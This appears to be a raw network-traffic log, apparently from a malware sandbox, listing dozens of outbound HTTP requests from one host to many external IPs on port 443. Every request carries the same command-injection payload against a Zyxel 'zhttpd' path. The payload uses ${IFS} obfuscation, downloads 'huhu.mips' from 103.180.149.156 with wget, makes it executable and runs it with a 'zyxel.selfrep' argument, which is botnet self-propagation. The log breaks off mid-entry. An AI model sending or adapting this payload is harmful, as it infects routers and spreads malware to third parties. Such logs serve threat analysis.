                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      9192.168.2.143612825.117.191.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104412079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      10192.168.2.1443928181.132.183.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104482889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11192.168.2.145000235.23.216.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104506016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      12192.168.2.143931225.228.141.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104631901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      13192.168.2.1436004164.150.213.13443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104716063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      14192.168.2.1458806144.165.91.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104763985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      15192.168.2.1439320212.250.126.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104876041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      16192.168.2.1457386146.123.114.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.104911089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      17192.168.2.145457293.166.22.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105020046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18192.168.2.144304474.107.209.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105099916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      19192.168.2.1455614100.219.42.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105156898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20192.168.2.1454300212.39.105.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105189085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21192.168.2.144277840.136.112.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105226040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      22192.168.2.1443804173.143.120.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105310917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      23192.168.2.1450650166.227.45.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105349064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      24192.168.2.1444994189.209.252.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105389118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      25192.168.2.14403288.238.212.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105421066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      26192.168.2.144382060.252.192.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105446100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      27192.168.2.1436008144.54.146.42443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105529070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      28192.168.2.1450278135.81.145.58443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105631113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      29192.168.2.1450038126.160.7.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105678082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      30192.168.2.143552838.236.122.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105727911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      31192.168.2.1443570120.252.213.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105848074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      32192.168.2.1451260181.225.51.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.105933905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      33192.168.2.1439818132.194.255.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106019974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      34192.168.2.1435182213.5.190.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106061935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      35192.168.2.1447446206.243.60.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106127024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      36192.168.2.1439844110.44.212.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106203079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      37192.168.2.145348863.107.186.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106270075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      38192.168.2.144046874.15.213.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106319904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      39192.168.2.1448022191.184.196.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106400013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      40192.168.2.144375640.192.3.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106479883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      41192.168.2.143483053.191.20.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106537104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      42192.168.2.145398645.70.251.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106647968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      43192.168.2.1454192125.54.158.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106750011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      44192.168.2.1436166172.32.195.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106825113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      45192.168.2.145880287.177.126.27443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106884003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      46192.168.2.145260857.7.205.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.106925964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      47192.168.2.1439216177.141.79.129443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107006073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      48192.168.2.1438654183.134.163.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107084036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      49192.168.2.145018046.189.235.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107192993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      50192.168.2.1439750211.135.98.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107266903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      51192.168.2.144073280.52.213.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107320070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      52192.168.2.144887661.83.29.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107420921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      53192.168.2.1432912152.34.201.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107450008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      54192.168.2.143790071.237.49.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107496023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      55192.168.2.1437840154.227.174.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107532978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      56192.168.2.1455560179.241.167.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107628107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      57192.168.2.1435230138.226.187.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107671976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      58192.168.2.1433514174.220.33.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107738018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      59192.168.2.143734243.172.181.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107785940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      60192.168.2.1448740137.96.107.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107816935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      61192.168.2.1438000154.25.253.77443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.107923985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      62192.168.2.146060890.150.217.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108043909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      63192.168.2.1438812121.141.161.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108130932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      64192.168.2.1456238191.113.156.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108156919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      65192.168.2.1443488153.27.168.128443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108213902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      66192.168.2.1451678146.132.97.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108278036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      67192.168.2.1458976153.89.63.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108328104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      68192.168.2.1452144142.142.200.206443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108360052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      69192.168.2.145430234.105.204.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108460903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      70192.168.2.1434422186.220.160.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108546019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      71192.168.2.1437196162.192.114.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:34:59.108649969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      72192.168.2.1458048191.112.234.5443
                                                      TimestampBytes transferredDirectionData
